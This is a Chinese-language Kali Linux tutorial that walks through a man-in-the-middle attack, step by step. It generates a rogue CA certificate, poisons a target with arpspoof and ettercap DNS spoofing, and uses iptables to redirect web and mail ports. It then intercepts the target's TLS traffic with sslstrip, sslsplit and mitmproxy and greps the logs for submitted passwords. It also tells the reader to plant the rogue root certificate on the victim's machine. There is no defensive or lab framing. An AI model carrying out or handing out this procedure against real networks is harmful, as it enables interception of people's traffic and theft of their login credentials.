Kali Linux系统实现DNS欺骗高级教程:

通过openssl证书生成私钥:

root@kali:~# openssl genrsa -out ca.key 2048

通过生成私钥签名生成证书:

root@kali:~# openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

开启IP内网路由转发:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@kali:~# arpspoof -i wlan0 -t 135.24.67.83 192.168.0.1

查看iptables规则:

root@kali:~# iptables -t nat -L -n

清空iptables规则:

root@kali:~# iptables -t nat -F

查看80/443端口是否占用:

root@kali:~# netstat -tulnp | grep 80

root@kali:~# netstat -tulnp | grep 443

将80端口流量转发给8080端口:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

将443端口流量转发给8443端口:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

将MSA邮件提交代理:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443

将SMTPS简单邮件传输:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443

将IMAPS接收邮件:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443

将POP3S邮件传输:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443

再次查看iptables规则:

root@kali:~# iptables -t nat -L -n

实现arpspoof欺骗:

root@kali:~# arpspoof -i wlan0 -t 135.24.67.83 192.168.0.1

修改hosts属性文件:

root@kali:~# vim /usr/share/ettercap/etter.dns

www.xxx.xxx.com  A 127.0.0.1

通过ettercap对目标主机进行ARP+DNS欺骗:

root@kali:~# route -n

root@kali:~# ettercap

root@kali:~# ettercap -Tq -i wlan0 -P dns_spoof -M arp:remote //135.24.67.83// //192.168.1.1//

启动ssltrip:

root@kali:~# sslstrip -a -f -k

root@kali:~# ettercap -Tq -i wlan0

修改sslstrip属性配置文件:

root@kali:~# vim  /etc/ettercap/etter.conf

将以下两行#注释去掉:

# if you use iptables:

  redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

  redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

sslstrip监听8080端口:

root@kali:~# sslstrip -l 8080

root@kali:~# cat sslstrip.log

创建目录:

root@kali:~# mkdir -p /root/test/logdir/

监听8080和8443端口:

root@kali:~# sslsplit -D -l connect.log -j /root/test -S /root/test/logdir -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

注:若不成功，再次生成ca.crt证书，当目标完成局域网下浏览网页并提交登录表单的同时，证书日志通过终端访问即可查看HTTP详细指纹信息！

查看网络流量:

root@kali:~# tcpdump arp

root@kali:~# tcpdump host 135.24.67.83 and 192.168.0.105

root@kali:~# mkdir /root/test/logdir/

root@kali:~/test/logdir# ls

root@kali:~/test/logdir# grep 456456 *

root@kali:~/test/logdir# grep password *

注:为了避免证书报错，将生成的cs.crt根证书拷贝到被攻击者机器上进行安装

mitmproxy证书欺骗:

root@kali:~# mitmproxy -T --host -w mitmproxy.log

查看日志log:

root@kali:~# ll mitmproxy.log